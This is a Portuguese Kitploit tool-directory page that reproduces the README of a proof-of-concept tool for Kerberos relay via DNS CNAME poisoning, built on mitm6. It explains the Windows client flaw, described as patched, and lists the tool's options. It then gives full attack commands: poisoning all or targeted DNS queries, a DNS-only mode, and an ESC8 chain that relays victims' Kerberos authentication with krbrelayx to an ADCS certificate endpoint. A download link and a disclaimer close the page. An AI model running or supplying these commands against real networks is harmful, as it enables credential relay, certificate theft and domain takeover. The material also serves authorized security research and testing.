Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
MITM6-Kerberos-CNAME-Abuse — PoC de abuso de CNAME no Kerberos | Kitploit
Ferramentas/GitHubGitHub/benzamir/mitm6-kerberos-cname-abuse
ExploraçãoMovimento LateralExploração de Aplicações WebTestes de PenetraçãoComando e ControleAutenticaçãoRed TeamingAnálise de DNS
GitHub
benzamir/mitm6-kerberos-cname-abuse

MITM6-Kerberos-CNAME-Abuse

PoC de abuso de CNAME no Kerberos

Ver Repositório
1082019há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Relé de Autenticação Kerberos - Técnica de Abuso de CNAME (PoC)

Contexto

Esta ferramenta é a prova de conceito para a técnica de Relé de Abuso de CNAME Kerberos, baseada na ferramenta MITM6.

A pesquisa revelou uma falha no comportamento do cliente Kerberos do Windows: quando um registro DNS CNAME é retornado, o cliente segue o alias e constrói a solicitação TGS usando o nome do host CNAME como SPN. Isso permite que um atacante com posição MITM de DNS coaja qualquer usuário do domínio a solicitar um ticket Kerberos para um serviço escolhido pelo atacante, possibilitando ataques de relé sob demanda entre protocolos contra SMB, HTTP e outros serviços onde a assinatura ou o Channel Binding não são aplicados.

Ao contrário de técnicas anteriores de relé Kerberos que eram limitadas a contas de máquina ou exigiam condições específicas, este método funciona de forma confiável contra contas de usuário em configurações padrão do Windows. A Microsoft mitigou o risco aplicando um patch para impor CBT em https e habilitar a assinatura por padrão para protocolos afetados. A correção é rastreada como CVE-2026-20929 Para detalhes técnicos completos, passo a passo de exploração e análise de impacto, veja o post do blog na Cymulate.

Recursos Adicionados de Abuso de CNAME

Envenenamento de CNAME

Use --cname-source para segmentar um domínio específico que a vítima tenta acessar, ou --cname-source-all para envenenar todas as consultas DNS. Ambos exigem --cname para especificar o nome do host alvo que será usado na resposta CNAME (a vítima solicitará então um TGS para este nome de host).

Modo Apenas DNS

A flag --only-dns desativa o servidor DHCPv6 original do mitm6 e a funcionalidade de Router Advertisement. Isso permite combinar o envenenamento de CNAME com outras técnicas MITM, como envenenamento ARP.

Passthrough

A opção --passthrough aceita um arquivo contendo domínios que devem ser resolvidos para seus endereços IP reais (formato: domain:ip por linha). Útil para manter a conectividade com infraestrutura crítica como Controladores de Domínio (experimental).

Instalação

pip install -r requirements.txt

Uso

Envenenamento de CNAME (Todos os Domínios)

Envenene todas as consultas DNS com um CNAME apontando para o alvo do relé:

python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname target.corp.local

Envenenamento de CNAME (Domínio Específico)

Envenene apenas consultas para um nome de host específico:

python mitm6-cname.py -i eth0 -d corp.local --cname-source fileserver.corp.local --cname adcs.corp.local

Modo Apenas DNS

Pule DHCPv6/RA ao usar envenenamento ARP para MITM DNS:

python mitm6-cname.py -i eth0 --only-dns -d corp.local --cname-source-all --cname target.corp.local

Exemplo: Ataque ESC8

# Terminal 1: CNAME poisoning
python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname adcs.corp.local

# Terminal 2: Relay to ADCS
krbrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template User

Créditos

  • Original mitm6: Dirk-jan Mollema

Testado Em

  • Windows 10, 11
  • Windows Server 2022, 2025

Requisitos

  • Python 3.x
  • Linux OS

Aviso Legal

Esta ferramenta é uma PoC não produtiva fornecida apenas para fins educacionais e de teste de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use por sua conta e risco e apenas contra sistemas para os quais você tenha permissão explícita para testar.

Licença

MIT

Baixar ferramenta